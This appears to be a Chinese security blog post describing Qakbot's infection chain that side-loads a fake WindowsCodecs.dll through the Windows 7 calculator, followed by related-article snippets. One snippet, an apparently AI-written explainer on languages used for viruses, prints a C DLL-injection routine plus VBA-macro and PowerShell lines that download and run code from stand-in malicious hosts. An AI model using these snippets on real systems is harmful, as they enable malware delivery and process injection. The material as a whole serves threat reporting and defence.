Qakbot新型感染链:使用Windows7系统侧加载感染设备

最新推荐文章于 2025-09-26 12:40:40 发布
原创 最新推荐文章于 2025-09-26 12:40:40 发布 · 536 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #DLL #Qakbot

安全研究人员发现,Qakbot恶意软件自7月11日起通过DLL侧加载技术,利用Windows7计算器应用进行攻击。攻击者在WinSxS目录中植入伪造DLL,欺骗系统加载,导致设备感染。Qakbot最初是银行木马,现用作恶意软件投递器,传播RansomExx、Maze等勒索软件。攻击链涉及HTML附件、ZIP文件、ISO镜像和LNK快捷方式,诱导用户触发恶意DLL加载。此漏洞不适用于Windows10,因此攻击者主要针对Windows7系统。

前言:DLL侧加载(DLL side-loading)是一种常见的攻击方法,也就是我们常说的“白加黑”技术,它利用了Windows中处理动态链接库(DLL)的方式。Qakbot恶意软件的开发者通过使用Windows7系统在被感染的计算机上侧加载恶意负载,最终达到感染设备的效果。
近日,安全研究人员ProxyLife发现,从今年7月11日开始Qakbot滥用Windows 7 Calculator应用程序进行DLL侧加载攻击。这种方法也被继续被用于恶意垃圾邮件活动。
Qakbot 恶意软件的开发者通过使用Windows7系统在被感染的计算机上侧加载恶意负载,最终达到感染设备的效果。

 

DLL侧加载(DLL side-loading)
动态链接DLL是包含了若干个函数、类和资源的库文件。它可以被其他可执行文件(如.EXE文件和其它DLL文件)动态调用。使用DL的第一个优点是使多个应用程序,甚至是不同语言编写的应用程序可以共享一个DL文件,真正实现了“资源共享”;另一个优点是将DL文件作为应用程序一个独立的模块设计时,可以提高软件的开发速度,为软件升级提供了方便。

 

而DLL侧加载(DLL side-loading)是一种常见的攻击方法,也就是我们常说的“白加黑”技术,它利用了Windows中处理动态链接库(DLL)的方式。DLL侧加载(DLL side-loading)恶意软件通过欺骗一个合法的DLL,会在Windows的WinSxS目录中放置一个伪造的恶意DLL文件,以便操作系统加载它而不是合法文件。
DLL侧加载攻击(DLL side-loading Attack)
通常在Microsoft Windows中,程序可以通过指定完整路径或使用清单等其他机制来定义在运行时加载哪些库或文件夹。程序清单可以包括DLL重定向、文件名或完整路径。因此,如果清单只引用了一个库文件名,它被视为弱引用并且容易受到DLL侧加载攻击。
DLL侧加载攻击主要是利用弱库引用和Windows默认的搜索顺序,在系统上放置一个伪装成合法DLL的恶意DLL文件,合法程序将自动加载该文件。

 
DLL侧加载通常会被勒索软件运营商使用,他们利用DLL侧加载来执行勒索软件有效载荷,以逃避安全产品的检测
Qakbot病毒
Qakbot病毒最开始是一种银行木马,受影响系统为微软Windows。Qakbot最早被发现于2009年,根据微软的分析,Qakbot被认为是由网络犯罪组织Gold Lagoon创建的。
Qakbot专门针对企业、银行、医疗、教育等机构进行强大的信息窃取功能,并持续监控用户的银行活动以欺诈大量钱财。
近年来,Qakbot发现了多个升级的变种,利用高级技术进行反检测与自我伪装,试图躲过了杀毒软件检测。后来Qakbot演变成了恶意软件投递器,勒索软件团伙在攻击的早期阶段使用它来投递攻击信标,造成了许多重大经济损失。
而且Qakbot交付的其它勒索软件包括RansomExx、Maze、ProLock和Egregor,最近,还发布了Black Basta勒索软件。

 

Qakbot新型感染链
那么Qakbot病毒是如何运行DLL侧加载(DLL side-loading)?
为了防御这种危险链接和攻击,ProxyLife和Cyble的研究人员记仔细研究和记录了新型的Qakbot感染链。
在最新的活动中使用的电子邮件带有一个HTML文件附件,该附件下载了一个有密码保护的ZIP压缩包,其中包含一个ISO文件。
打开ZIP文件的密码显示在HTML文件中,锁定存档的原因是为了躲避反病毒软件的检测。
ISO包含一个lnk文件,一个“calc.exe”(Windows计算器)的副本,以及两个DLL文件,即WindowsCodecs.dll和一个名7533.dll的有效负载。

 

当用户挂载ISO文件时,它只显示lnk文件,该文件被伪装成有重要信息的PDF文件或使用Microsoft Edge浏览器打开的文件。
然而,在Windows中,快捷方式指向计算器应用程序。
单击快捷方式通过命令提示符执行Calc.exe最终就会触发感染。
Qakbot恶意软件的新型感染链的关键在于感染文件会被伪装成其它文件。因为在加载时,Windows 7系统会自动搜索并尝试加载合法的WindowsCodecs DLL文件。

 


但是,Windows 7系统不会检查某些硬编码路径中的DLL,如果将DLL文件放置在与Calc.exe可执行文件相同的文件夹中,它将加载具有相同名称的任何DLL。
威胁者就是利用这个漏洞,创建他们自己的恶意WindowsCodecs.dll文件,然后启动其它编号.dll文件。
通过像Windows系统程序安装Qakbot后,一些安全软件在加载恶意软件时则无法检测出它,造成了这种威胁逃避了安全软件检测。
但是有一点,此DLL侧加载漏洞不适用于Windows 10 Calc.exe及以后版本,这也是威胁者会针对Windows 7版本的原因。

 


Qakbot已经有十多年的历史了,虽然投放这种病毒的活动并不频繁,但是根据记载,Emotet僵尸网络曾经通过散布这种病毒来投放勒索软件的有效载荷。
(部分消息链接:https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/)


 

[系统安全] 六十二.恶意软件分析 (13)LLM赋能实现基于机器学习的恶意家族分类(初探)
杨秀璋的专栏
02-02 1422
前文探索了利用大模型辅助恶意代码分析,即LLM赋能Lark工具提取XLM代码的抽象语法树。这篇文章将继续尝试探索利用大模型辅助恶意代码分析,尝试进行恶意代码家族分类实验。在恶意代码分析过程中,大家会遇到各种各样的问题,如何结合LLM和GPT完成复杂任务,更好地为安全工程师合作至关重要。基础性探索文章,还请各位大佬多多指教,写得不足的地方还请海涵。希望您喜欢,且看且珍惜。
2024年十大高危恶意软件及其防御策略概览
网络安全
11-18 912
Emotet最初是一个银行木马,现已演变为多功能的恶意软件平台,因其高效的“敏捷开发”能力在业界闻名,主要通过带有恶意附件的钓鱼邮件传播。面对日益复杂的恶意软件威胁,企业应采取情报驱动的主动防御策略,包括定期更新系统和软件、加强网络钓鱼防御、实施多因素身份验证并投资行为分析工具,以检测和阻止潜在的攻击。针对Windows平台的木马,将目标系统系统信息发送到远程服务器,从服务器接收命令来下载并执行插件、终止进程、卸载/更新自身以及捕获受感染系统的屏幕截图。
dll加载手册
jentle8的博客
08-28 521
dll sideloading 在恶意软件对抗中并不少用,快速使用和识别可以加速分析过程
一种应用更广泛的DLL载方法
Mccc_li的博客
09-20 1121
可以看到堆栈的情况,并没有调用LoadLibrary函数的情况,该dll加载先于程序的入口点,原始程序加载dll运行一段时间就会退出,因此可以在msvcp140.dll加载后将程序入口点patch阻断原始程序的运行流程。使用SharpDllProxy将msvcp140.dll的导出函数导出到文件中,该工具会生成一个.c的文件和一个dll,这个dll就是原始的msvcp140.dll。将上面导出的函数替换到下面代码的位置,然后编译生成dll文件,将该dll文件重命名为msvcp140.dll
全面解析WindowsCodecs.dll错误及4大修复方法(附详细步骤)
最新发布
专治系统各类疑难杂症,分享超实用技巧!
09-26 1167
WindowsCodecs.dll错误通常由文件缺失、系统兼容性或注册表问题引发。通过系统工具扫描、手动替换文件或使用专业工具(如“”)均可高效解决问题。日常使用中,建议定期维护系统并做好备份,以降低DLL故障风险。
C++函数动态接库及静态
csh1915259502的博客
10-12 1150
动态接库的使用方法,动态接库的动态调用(也叫显式调用)可以运用了,但是静态调用(也叫隐式调用)这种很少见。   (一)先回顾一下,动态接库和静态接库   静态接库:lib中的函数不仅被连接,全部实现都被直接包含在最终生成的EXE文件中,只是实现是不可见的。   动态接库:dll不必被包含在最终的EXE中,静态调用时仅把函数名或者变量名或者类名接到EXE文件中,而这些东西的实体都只有
Qakbot恶意软件利用OneNote进行传播
dzqxwzoe的博客
08-24 274
Qakbot是一种自2007年以来一直活跃的复杂恶意软件,具有自我复制和传播的蠕虫特性。其主要攻击目标为银行业和金融机构,旨在窃取受感染系统中的敏感信息和凭证。Qakbot通过多种手段获取访问权限,包括社会工程和漏洞利用。该恶意软件还具备高度定制化的C&C通信,可用于获取其他恶意软件模块和执行数据外泄等功能。Qakbot的特点在于其高度隐蔽性和逃避技术,例如反沙箱和反虚拟机检测等。它主要通过钓鱼电子邮件和恶意附件进行传播,但最近通过利用OneNote文档进行传播的情况数量有所增加。
QakBot银行恶意软件导致大量 Active Directory 被锁定
weixin_33975951的博客
09-18 263
本文讲的是QakBot银行恶意软件导致大量 Active Directory 被锁定,近日,IBM公司的恶意软件研究人员注意到,成百上千个Active Directory用户被锁定在其公司的域名之外,而此次事件正是由Qbot银行恶意软件所造成的。 关于Active Directory 活动目录(Active Directory)是面向 Windows ...
我是程序猿:Windows能被感染?最常见的恶意电子邮件附件
C语言C++学习俱乐部:765860056
10-21 2030
引语:为了确保网络安全,每个人都需要识别出那些经常被用来传播恶意软件的仿冒电子邮件附件。 为确保网络安全,每个人都需要识别出那些经常被用来传播恶意软件的钓鱼电子邮件附件。 在恶意软件传播的过程中,攻击者会将垃圾邮件伪装为发票、邀请、支付信息、交通信息、电子邮件、语音邮件等等。在打开或启用了宏之后,这些电子邮件中包含恶意的 Word和 Excel附件或接,这些附件将在计算机上安装恶意软件。 但 Office要求您在执行 Word或 Excel中的宏之前,先点击“启用编辑”或“启用内容”按..
Wireshark教程:解密HTTPS流量
Palpitate_LL的博客
08-02 5340
本教程面向进行流量分析的安全专业人员。本教程假定你已经熟悉Wireshark的基本使用,并使用Wireshark 3.x版。在审查可疑的网络活动时,我们经常会遇到加密的流量。因为大多数网站使用安全超文本传输​协议(HTTPS)协议。和网站一样,各种类型的恶意软件也使用HTTPS。在检查恶意软件活动中的PCAP时,了解感染后流量中包含的内容非常重要。该Wireshark教程讲解如何使用https日志文件从Wireshark中的pcap解密HTTPS流量。该日志包含https加密密钥数据。
YARA规则编写权威指南:打造针对此类恶意命名文件的精准检测模型
本文系统研究YARA规则在恶意文件检测中的关键技术与实战应用,从语法规则、模式匹配机制到高级特性进行深入解析,构建基于命名特征的恶意行为检测模型,并提出结合正则表达式、文件路径与动态属性的多维分析方法以...
DLLsForHackers:可以用于加载和其他攻击媒介的Dll
03-20
DLLsForHackers 可用于加载和其他攻击媒介的Dll。此Dll不会导致死锁,因为它仅使用如下所述的DllMain安全的功能。 为什么? 我看到太多的POC与在DLL_PROCESS_ATTACH执行的代码。实际上,大多数情况下,恶意代码无法按照Microsoft的说明进行工作( )。 您永远不要在DllMain中执行以下任务: 调用LoadLibrary或LoadLibraryEx(直接或间接)。这可能会导致死锁或崩溃。 调用GetStringTypeA,GetStringTypeEx或GetStringTypeW(直接或间接)。这可能会导致死锁或崩溃。 与其他线程同步。这可能会导致死锁。 获取由等待获取加载程序锁的代码所拥有的同步对象。这可能会导致死锁。 通过使用CoInitializeEx初始化COM线程。在某些情况下,此函数可以调用LoadLibraryEx。 调用注
全面解析Qakbot***
weixin_34062329的博客
10-31 421
来源:赛迪网  虽然Qakbot这个名字听起来很可笑,但当听说这个***是针对企业和公司帐户时——就没有人再笑了。Qakbot***以其主要的可执行文件_qakbot.dll命名,它并不是一种新的***;但RSA FraudAction研究实验室在Qakbot中发现了一些以前很少在其他金融犯罪软件中出现的独特属性。   对Qakbot的最新研究表明,它的触发列表几乎...
Black Basta 勒索软件利用 QakBot 进行分发
ALLEN'Blog
03-27 323
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
依托电子邮件传播的银行木马QakBot
互联网安全研究院
09-16 478
近年来,QakBot已成为全球流行的银行木马之一。它的主要目的是窃取银行凭证(如登录名、密码等)。时至今日,QakBot仍在不断更新和发展,不断增加新的功能并更新其模块,以窃取信息并使收入最大化。 QakBot恶意软件入侵后,会监视金融业务、自我传播和安装勒索软件等,以便从受感染的企业机构中获得最大收益。并且,我国是该木马的主要攻击国,主要针对政府、金融、企业、医疗等关键行业。 QakBot传播方式 QakBot主要通过垃圾邮件传播和感染受害者的,其电子邮件附件包含Microsoft Office文档
Qakbot感染与黑巴斯塔勒索软件运动有关
kafankeji的博客
11-24 249
Cybereason观察到的QakBot感染始于一封含有恶意URL接的垃圾邮件或钓鱼邮件,而QakBot是Black Basta用来在受害者网络中保持存在的主要方法。在Cybereason发现的几起QakBot感染中,据称有两起允许威胁行为者部署勒索软件,并通过禁用DNS服务将受害者锁定在其网络之外,使恢复变得更加复杂。根据该通知,在新的攻击中,威胁行为者在不到两小时内获得了域管理员访问权限,然后在不到12小时内转移到勒索软件部署。
@value 静态变量_调试实战 —— dll 加载失败之全局变量初始化篇
weixin_39931390的博客
11-20 243
前言最近项目里总是遇到 dll 加载不上的问题,原因各种各样。今天先总结一个虽然不是项目中实际遇到的问题,但是却非常经典的情况。其它情况,后续慢慢总结。示例代码包含一个 exe 工程,两个 dll 工程。 exe 会加载两个 dll 并调用它们的导出函数(GetCallCount),结果只有一个 dll 的导出函数被成功调用。会是什么原因呢?现象运行效果如下图:通过 dumpbin 已经确认两个 ...
給初學者的DLL Side Loading的UAC繞過
weixin_34361881的博客
03-08 419
Adr · 2015/12/10 12:120x00 UAC是什麼?在Windows從Vista版本之後加⼊了多個安全性防護如隨機化模組地址(ALSR)、資料防⽌執行(DEP)、使⽤者帳⼾控制(UAC) … 等,ALSR與DEP為exploit上的shellcode插⼊利⽤帶來的相當程度的困難度(當然站在現在技術⽽言繞過並⾮難事)不過今天要談的並非這兩者防護,⽽是要談使用者帳⼾控制(UAC)。(後...
DLL】【学习笔记】(一)DLL的两种加载方式的过程
此地无银
02-19 3923
DLL显式加载和隐式加载的过程说明
一般的计算机病毒是什么语言写的?
03-11
<think>嗯,用户之前问过计算机病毒的定义、原理和杀毒原理,现在接着问病毒是用什么语言写的。可能需要先确认用户对编程语言的了解程度,但用户可能已经有一定的技术背景,因为之前的问题比较深入。 首先,用户想知道病毒用什么语言写,可能是想了解如何防范或者学习相关知识。回答时需要涵盖常见的语言,比如低级语言如汇编,高级语言如C、C++、Python等,并解释为什么选择这些语言。 要考虑到不同语言的优缺点,比如汇编直接操作硬件,适合底层攻击;C/C++执行效率高,适合系统级病毒;脚本语言如Python和PowerShell便于快速开发,但依赖环境。还要提到宏病毒使用的VBA,因为这在文档中常见。 另外,现代病毒可能使用多种语言组合,比如核心部分用C,传播模块用Python。需要解释跨平台攻击的情况,比如使用Java或Go语言。最后,强调无论哪种语言,病毒的本质是恶意的,提醒用户注意安全。 可能用户有编程基础,想了解技术细节,或者作为学习者想拓展知识。回答要结构清晰,分点列出,用例子说明,比如WannaCry用C,NotPetya用C++,这样更具体。同时注意避免鼓励恶意使用,保持中立和教育的态度。</think>### 计算机病毒的编程语言选择 计算机病毒可以使用多种编程语言编写,其语言选择取决于**攻击目标**、**传播方式**和**隐蔽需求**,主要分为以下几类: --- #### 一、底层系统级语言(直接控制硬件) 1. **汇编语言** - 特点:直接操作寄存器(如`EAX`、`EBX`)和内存地址(`MOV [0x7C00], AX`) - 应用场景:引导扇区病毒(如Stoned病毒)、内核级Rootkit - 优势:代码体积小(可压缩到几十字节),执行效率高(无编译器优化层) 2. **C/C++** - 特点:通过指针操作实现进程注入(如`WriteProcessMemory` API) - 典型案例:WannaCry勒索病毒(利用`C`编写的`EternalBlue`漏洞利用模块) - 代码示例: ```c void InjectCode(DWORD pid, char* dllPath) { HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); LPVOID pRemoteMem = VirtualAllocEx(hProcess, NULL, strlen(dllPath), MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(hProcess, pRemoteMem, dllPath, strlen(dllPath), NULL); CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, pRemoteMem, 0, NULL); } ``` --- #### 二、脚本语言(快速传播与混淆) 1. **VBA(宏病毒)** - 特点:寄生在Office文档(`.DOCM`)的宏代码中 - 传播方式:自动执行`AutoOpen()`或`Document_Open()`函数 - 示例代码: ```vb Sub Document_Open() Shell "cmd.exe /c certutil -urlcache -split -f http://malware.com/backdoor.exe C:\Windows\Temp\evil.exe" End Sub ``` 2. **PowerShell** - 特点:内存加载恶意代码(无文件攻击) - 典型攻击: ```powershell $payload = (New-Object Net.WebClient).DownloadString('http://malicious.site/script.ps1') Invoke-Expression $payload # 直接内存执行 ``` 3. **Python/JavaScript** - 应用场景: - 跨平台病毒(如通过`PyInstaller`打包成EXE) - 网页挂马(利用`<script>document.cookie</script>`窃取信息) --- #### 三、混合语言攻击(现代病毒趋势) 1. **C# + Native API** - 通过`DllImport`调用Win32 API实现提权: ```csharp [DllImport("kernel32.dll")] static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); ``` 2. **Go语言** - 优势:静态编译无依赖(单EXE文件)、跨平台(可编译Linux/Windows双版本) - 案例:2019年发现的`GoBot2`后门程序 --- ### 语言选择与防御难度关系表 | 语言类型 | 检测难度 | 传播速度 | 典型病毒家族 | |--------------|----------|----------|--------------------| | 汇编 | ★★★★★ | ★★☆ | CIH、Stoned | | C/C++ | ★★★★☆ | ★★★☆ | WannaCry、NotPetya | | PowerShell | ★★☆☆☆ | ★★★★☆ | Emotet、QakBot | | Python打包 | ★★★☆☆ | ★★★☆☆ | 钓鱼邮件附件病毒 | --- #### 防御建议 1. 禁用Office宏执行(通过组策略设置`HKCU\Software\Policies\Microsoft\Office`) 2. 限制PowerShell脚本执行策略(`Set-ExecutionPolicy Restricted`) 3. 使用静态分析工具检测可疑API调用(如`VirtualAllocEx`+`CreateRemoteThread`组合) 病毒开发语言仅是实现手段,其危害性最终取决于**攻击者的意图**和**漏洞利用能力**。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值